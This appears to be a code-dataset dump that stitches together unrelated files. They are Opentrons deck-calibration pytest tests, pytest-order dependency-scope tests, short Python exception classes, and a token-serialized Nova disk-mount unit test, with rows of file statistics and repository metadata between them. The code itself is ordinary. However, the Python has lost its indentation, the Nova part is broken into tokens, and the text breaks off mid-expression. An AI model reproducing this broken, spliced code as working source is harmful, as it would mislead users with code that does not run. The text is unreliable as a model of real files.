# particular, during simulating mode the driver's `position` method returns
# the xyz position of the tip of the pipette, but during non-simulating mode
# it returns a position that correponds roughly to the gantry (e.g.: where the
# Smoothie board sees the position of itself--after a fashion). Simulating mode
# should be replaced with something that accurately reflects actual robot
# operation, and then these tests should be revised to match expected reality.
@pytest.mark.api1_only
async def test_transform_from_moves(async_server, async_client, monkeypatch):
test_mount, test_model = ('left', 'p300_multi_v1')
hardware = async_server['com.opentrons.hardware']
def dummy_read_model(mount):
if mount == test_mount:
return test_model
else:
return None
monkeypatch.setattr(
hardware._driver, 'read_pipette_model', dummy_read_model)
hardware.reset()
hardware.home()
# This is difficult to test without the `async_client` because it has to
# take an `aiohttp.web.Request` object as a parameter instead of a dict
resp = await async_client.post('/calibration/deck/start')
start_res = await resp.json()
token = start_res.get('token')
assert start_res.get('pipette', {}).get('mount') == test_mount
assert start_res.get('pipette', {}).get('model') == test_model
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'attach tip', 'tipLength': 51.7})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': 'safeZ'})
assert res.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'z',
'direction': -1,
'step': 4.5})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save z'})
assert res.status == 200
pipette = endpoints.session.pipettes[test_mount]
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '1'})
assert res.status == 200
pt1 = endpoints.safe_points().get('1')
if 'multi' in test_model:
expected1 = (
pt1[0],
pt1[1] + 2 * Y_OFFSET_MULTI,
pt1[2])
else:
expected1 = pt1
assert np.isclose(absolute(hardware.poses, pipette), expected1).all()
# Jog to calculated position for transform
x_delta1 = 13.16824337 - dc.endpoints.safe_points()['1'][0]
y_delta1 = 8.30855312 - dc.endpoints.safe_points()['1'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta1})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta1})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '1'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '2'})
assert res.status == 200
pt2 = endpoints.safe_points().get('2')
if 'multi' in test_model:
expected2 = (
pt2[0],
pt2[1] + 2 * Y_OFFSET_MULTI,
pt2[2])
else:
expected2 = pt2
assert np.isclose(absolute(hardware.poses, pipette), expected2).all()
# Jog to calculated position for transform
x_delta2 = 380.50507635 - dc.endpoints.safe_points()['2'][0]
y_delta2 = -23.82925545 - dc.endpoints.safe_points()['2'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta2})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta2})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '2'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '3'})
assert res.status == 200
pt3 = endpoints.safe_points().get('3')
if 'multi' in test_model:
expected3 = (
pt3[0],
pt3[1] + 2 * Y_OFFSET_MULTI,
pt3[2])
else:
expected3 = pt3
assert np.isclose(absolute(hardware.poses, pipette), expected3).all()
# Jog to calculated position for transform
x_delta3 = 34.87002331 - dc.endpoints.safe_points()['3'][0]
y_delta3 = 256.36103295 - dc.endpoints.safe_points()['3'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta3})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta3})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '3'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save transform'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'release'})
assert res.status == 200
# This transform represents a 5 degree rotation, with a shift in x, y, & z.
# Values for the points and expected transform come from a hand-crafted
# transformation matrix and the points that would generate that matrix.
cos_5deg_p = 0.9962
sin_5deg_p = 0.0872
sin_5deg_n = -sin_5deg_p
const_zero = 0.0
const_one_ = 1.0
delta_x___ = 0.3
delta_y___ = 0.4
delta_z___ = 0.5
expected_transform = [
[cos_5deg_p, sin_5deg_p, const_zero, delta_x___],
[sin_5deg_n, cos_5deg_p, const_zero, delta_y___],
[const_zero, const_zero, const_one_, delta_z___],
[const_zero, const_zero, const_zero, const_one_]]
actual_transform = hardware.config.gantry_calibration
assert np.allclose(actual_transform, expected_transform)
@pytest.mark.api2_only
async def test_transform_from_moves_v2(
async_server, async_client, monkeypatch):
test_mount, test_model = (types.Mount.LEFT, 'p300_multi_v1')
hardware = async_server['com.opentrons.hardware']
await hardware.reset()
await hardware.cache_instruments({
test_mount: test_model,
types.Mount.RIGHT: None})
await hardware.home()
# This is difficult to test without the `async_client` because it has to
# take an `aiohttp.web.Request` object as a parameter instead of a dict
resp = await async_client.post('/calibration/deck/start')
start_res = await resp.json()
token = start_res.get('token')
assert start_res.get('pipette', {}).get('mount') == 'left'
assert start_res.get('pipette', {}).get('model') == test_model
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'attach tip', 'tipLength': 51.7})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': 'safeZ'})
assert res.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'z',
'direction': -1,
'step': 4.5})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save z'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '1'})
assert res.status == 200
expected1 = endpoints.safe_points().get('1')
coordinates = await hardware.gantry_position(
test_mount, critical_point=CriticalPoint.FRONT_NOZZLE)
position = (
coordinates.x,
coordinates.y,
coordinates.z)
assert np.isclose(position, expected1).all()
# Jog to calculated position for transform
x_delta1 = 13.16824337 - dc.endpoints.safe_points()['1'][0]
y_delta1 = 8.30855312 - dc.endpoints.safe_points()['1'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta1})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta1})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '1'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '2'})
assert res.status == 200
expected2 = endpoints.safe_points().get('2')
coordinates = await hardware.gantry_position(
test_mount, critical_point=CriticalPoint.FRONT_NOZZLE)
position = (
coordinates.x,
coordinates.y,
coordinates.z)
assert np.isclose(position, expected2).all()
# Jog to calculated position for transform
x_delta2 = 380.50507635 - dc.endpoints.safe_points()['2'][0]
y_delta2 = -23.82925545 - dc.endpoints.safe_points()['2'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta2})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta2})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '2'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '3'})
assert res.status == 200
expected3 = endpoints.safe_points().get('3')
coordinates = await hardware.gantry_position(
test_mount, critical_point=CriticalPoint.FRONT_NOZZLE)
position = (
coordinates.x,
coordinates.y,
coordinates.z)
assert np.isclose(position, expected3).all()
# Jog to calculated position for transform
x_delta3 = 34.87002331 - dc.endpoints.safe_points()['3'][0]
y_delta3 = 256.36103295 - dc.endpoints.safe_points()['3'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta3})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta3})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '3'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save transform'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'release'})
assert res.status == 200
# This transform represents a 5 degree rotation, with a shift in x, y, & z.
# Values for the points and expected transform come from a hand-crafted
# transformation matrix and the points that would generate that matrix.
cos_5deg_p = 0.9962
sin_5deg_p = 0.0872
sin_5deg_n = -sin_5deg_p
const_zero = 0.0
const_one_ = 1.0
delta_x___ = 0.3
delta_y___ = 0.4
delta_z___ = 0.5
expected_transform = [
[cos_5deg_p, sin_5deg_p, const_zero, delta_x___],
[sin_5deg_n, cos_5deg_p, const_zero, delta_y___],
[const_zero, const_zero, const_one_, delta_z___],
[const_zero, const_zero, const_zero, const_one_]]
conf = await hardware.config
actual_transform = conf.gantry_calibration
assert np.allclose(actual_transform, expected_transform)
| 36.229947
| 79
| 0.628192
| 1,709
| 13,550
| 4.819778
| 0.132241
| 0.056088
| 0.073813
| 0.092267
| 0.837926
| 0.809518
| 0.804905
| 0.780988
| 0.780988
| 0.752823
| 0
| 0.04143
| 0.232251
| 13,550
| 373
| 80
| 36.327078
| 0.75036
| 0.120295
| 0
| 0.796667
| 0
| 0
| 0.153775
| 0.007567
| 0
| 0
| 0
| 0
| 0.16
| 1
| 0.003333
| false
| 0
| 0.026667
| 0
| 0.036667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b525b468556b6951f8a5bc799cf90a478ceee6a
| 5,743
|
py
|
Python
|
tests/test_order_group_scope_named_dep.py
|
mrbean-bremen/pytest-order
|
50cb2f3735b6e6a02046f44eefc928e6a9da5268
|
[
"MIT"
] | 12
|
2020-11-17T16:58:05.000Z
|
2021-06-08T06:26:37.000Z
|
tests/test_order_group_scope_named_dep.py
|
mrbean-bremen/pytest-order
|
50cb2f3735b6e6a02046f44eefc928e6a9da5268
|
[
"MIT"
] | 8
|
2020-10-24T18:34:43.000Z
|
2021-03-04T08:08:19.000Z
|
tests/test_order_group_scope_named_dep.py
|
mrbean-bremen/pytest-order
|
50cb2f3735b6e6a02046f44eefc928e6a9da5268
|
[
"MIT"
] | 1
|
2020-12-07T12:29:47.000Z
|
2020-12-07T12:29:47.000Z
|
# -*- coding: utf-8 -*-
import os
import shutil
import pytest
import pytest_order
from tests.utils import write_test, assert_test_order
@pytest.fixture(scope="module")
def fixture_path(tmpdir_factory):
fixture_path = str(tmpdir_factory.mktemp("named_dep_scope"))
testname = os.path.join(fixture_path, "test_named_dep1.py")
test_class_contents = """
import pytest
class Test1:
@pytest.mark.dependency(depends=['Test2_test2'])
def test_one(self):
assert True
def test_two(self):
assert True
class Test2:
def test_one(self):
assert True
@pytest.mark.dependency(name='Test2_test2',
depends=['dep3_test_two'], scope='session')
def test_two(self):
assert True
"""
write_test(testname, test_class_contents)
test_function_contents = """
import pytest
@pytest.mark.dependency(depends=['dep3_test_two'], scope='session')
def test_one():
assert True
def test_two():
assert True
"""
testname = os.path.join(fixture_path, "test_named_dep2.py")
write_test(testname, test_function_contents)
test_function_contents = """
import pytest
def test_one():
assert True
@pytest.mark.dependency(name='dep3_test_two')
def test_two():
assert True
"""
testname = os.path.join(fixture_path, "test_named_dep3.py")
write_test(testname, test_function_contents)
test_function_contents = """
import pytest
def test_one():
assert True
def test_two():
assert True
"""
testname = os.path.join(fixture_path, "test_named_dep4.py")
write_test(testname, test_function_contents)
yield fixture_path
shutil.rmtree(fixture_path, ignore_errors=True)
@pytest.fixture(scope="module")
def fixture_file_paths(fixture_path):
yield [
os.path.join(fixture_path, "test_named_dep1.py"),
os.path.join(fixture_path, "test_named_dep2.py"),
os.path.join(fixture_path, "test_named_dep3.py"),
os.path.join(fixture_path, "test_named_dep4.py")
]
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_session_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep1.py::Test1::test_two",
"test_named_dep1.py::Test2::test_one",
"test_named_dep2.py::test_two",
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep2.py::test_one",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
assert "SKIPPED" not in out
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_module_group_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies",
"--order-group-scope=module", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep1.py::Test1::test_two",
"test_named_dep1.py::Test2::test_one",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep2.py::test_one",
"test_named_dep2.py::test_two",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
assert "SKIPPED" not in out
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_class_group_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies",
"--order-group-scope=class", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep1.py::Test2::test_one",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep1.py::Test1::test_two",
"test_named_dep2.py::test_one",
"test_named_dep2.py::test_two",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
assert "SKIPPED" not in out
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_class_group_scope_module_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies", "--order-group-scope=class",
"--order-scope=module", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep1.py::Test2::test_one",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep1.py::Test1::test_two",
"test_named_dep2.py::test_one",
"test_named_dep2.py::test_two",
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
# with module scope, dependencies cannot be ordered as needed
assert "SKIPPED" in out
| 31.554945
| 71
| 0.64879
| 760
| 5,743
| 4.577632
| 0.106579
| 0.124174
| 0.063237
| 0.09198
| 0.861742
| 0.861742
| 0.805116
| 0.77781
| 0.743604
| 0.687841
| 0
| 0.019991
| 0.216089
| 5,743
| 181
| 72
| 31.729282
| 0.752777
| 0.014104
| 0
| 0.723684
| 0
| 0
| 0.461212
| 0.268599
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.039474
| false
| 0
| 0.059211
| 0
| 0.098684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b77d7d4e0c6322ebbd4d5b71403682bb45e662c
| 415
|
py
|
Python
|
apps/overlay_manager/exceptions.py
|
matcala/cs-e4300_wireguard-mesh
|
b5fb64923a133f9c31dde5396de460cf749b4a59
|
[
"MIT"
] | null | null | null |
apps/overlay_manager/exceptions.py
|
matcala/cs-e4300_wireguard-mesh
|
b5fb64923a133f9c31dde5396de460cf749b4a59
|
[
"MIT"
] | null | null | null |
apps/overlay_manager/exceptions.py
|
matcala/cs-e4300_wireguard-mesh
|
b5fb64923a133f9c31dde5396de460cf749b4a59
|
[
"MIT"
] | 1
|
2022-01-28T17:18:46.000Z
|
2022-01-28T17:18:46.000Z
|
class StartupError(Exception):
def __init__(self, message):
self.message = message
class DeviceRegistrationError(Exception):
def __init__(self, message):
self.message = message
class OverlayRegistrationError(Exception):
def __init__(self, message):
self.message = message
class CannotAddToOverlay(Exception):
def __init__(self, message):
self.message = message
| 21.842105
| 42
| 0.706024
| 40
| 415
| 6.925
| 0.25
| 0.31769
| 0.231047
| 0.288809
| 0.703971
| 0.703971
| 0.703971
| 0.703971
| 0.541516
| 0
| 0
| 0
| 0.207229
| 415
| 18
| 43
| 23.055556
| 0.841945
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
754285744da5e07107626f5655d64ea5691d1e1b
| 19,038
|
py
|
Python
|
nova/tests/unit/virt/disk/mount/test_api.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/disk/mount/test_api.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/disk/mount/test_api.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2015 Hewlett-Packard Development Company, L.P.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'api'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'block'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'loop'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'nbd'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'image'
name|'import'
name|'model'
name|'as'
name|'imgmodel'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|PARTITION
name|'PARTITION'
op|'='
number|'77'
newline|'\n'
DECL|variable|ORIG_DEVICE
name|'ORIG_DEVICE'
op|'='
string|'"/dev/null"'
newline|'\n'
DECL|variable|AUTOMAP_PARTITION
name|'AUTOMAP_PARTITION'
op|'='
string|'"/dev/nullp77"'
newline|'\n'
DECL|variable|MAP_PARTITION
name|'MAP_PARTITION'
op|'='
string|'"/dev/mapper/nullp77"'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|MountTestCase
name|'class'
name|'MountTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'MountTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_map_dev
dedent|''
name|'def'
name|'_test_map_dev'
op|'('
name|'self'
op|','
name|'partition'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'image'
op|','
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'mount_dir'
op|')'
newline|'\n'
name|'mount'
op|'.'
name|'device'
op|'='
name|'ORIG_DEVICE'
newline|'\n'
name|'mount'
op|'.'
name|'partition'
op|'='
name|'partition'
newline|'\n'
name|'mount'
op|'.'
name|'map_dev'
op|'('
op|')'
newline|'\n'
name|'return'
name|'mount'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.utils.trycmd'"
op|')'
newline|'\n'
DECL|member|_test_map_dev_with_trycmd
name|'def'
name|'_test_map_dev_with_trycmd'
op|'('
name|'self'
op|','
name|'partition'
op|','
name|'trycmd'
op|')'
op|':'
newline|'\n'
indent|' '
name|'trycmd'
op|'.'
name|'return_value'
op|'='
op|'['
name|'None'
op|','
name|'None'
op|']'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'trycmd'
op|'.'
name|'call_count'
op|')'
comment|"# don't care about args"
newline|'\n'
name|'return'
name|'mount'
newline|'\n'
nl|'\n'
DECL|member|_exists_effect
dedent|''
name|'def'
name|'_exists_effect'
op|'('
name|'self'
op|','
name|'data'
op|')'
op|':'
newline|'\n'
DECL|function|exists_effect
indent|' '
name|'def'
name|'exists_effect'
op|'('
name|'filename'
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'v'
op|'='
name|'data'
op|'['
name|'filename'
op|']'
newline|'\n'
name|'if'
name|'isinstance'
op|'('
name|'v'
op|','
name|'list'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'len'
op|'('
name|'v'
op|')'
op|'>'
number|'0'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'v'
op|'.'
name|'pop'
op|'('
number|'0'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
string|'"Out of items for: %s"'
op|'%'
name|'filename'
op|')'
newline|'\n'
dedent|''
name|'return'
name|'v'
newline|'\n'
dedent|''
name|'except'
name|'KeyError'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fail'
op|'('
string|'"Unexpected call with: %s"'
op|'%'
name|'filename'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'exists_effect'
newline|'\n'
nl|'\n'
DECL|member|_check_calls
dedent|''
name|'def'
name|'_check_calls'
op|'('
name|'self'
op|','
name|'exists'
op|','
name|'filenames'
op|','
name|'trailing'
op|'='
number|'0'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'x'
op|')'
name|'for'
name|'x'
name|'in'
name|'filenames'
op|']'
op|','
nl|'\n'
name|'exists'
op|'.'
name|'call_args_list'
op|'['
op|':'
name|'len'
op|'('
name|'filenames'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'MAP_PARTITION'
op|')'
op|']'
op|'*'
name|'trailing'
op|','
nl|'\n'
name|'exists'
op|'.'
name|'call_args_list'
op|'['
name|'len'
op|'('
name|'filenames'
op|')'
op|':'
op|']'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_partition_search
name|'def'
name|'test_map_dev_partition_search'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
op|'-'
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_good
name|'def'
name|'test_map_dev_good'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'False'
op|','
nl|'\n'
name|'MAP_PARTITION'
op|':'
op|'['
name|'False'
op|','
name|'True'
op|']'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev_with_trycmd'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_error
name|'def'
name|'test_map_dev_error'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'False'
op|','
nl|'\n'
name|'MAP_PARTITION'
op|':'
name|'False'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev_with_trycmd'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|','
nl|'\n'
name|'api'
op|'.'
name|'MAX_FILE_CHECKS'
op|'+'
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_error_then_pass
name|'def'
name|'test_map_dev_error_then_pass'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'False'
op|','
nl|'\n'
name|'MAP_PARTITION'
op|':'
op|'['
name|'False'
op|','
name|'False'
op|','
name|'True'
op|']'
op|'}'
op|')'
newline|'\n'
name|'mount'
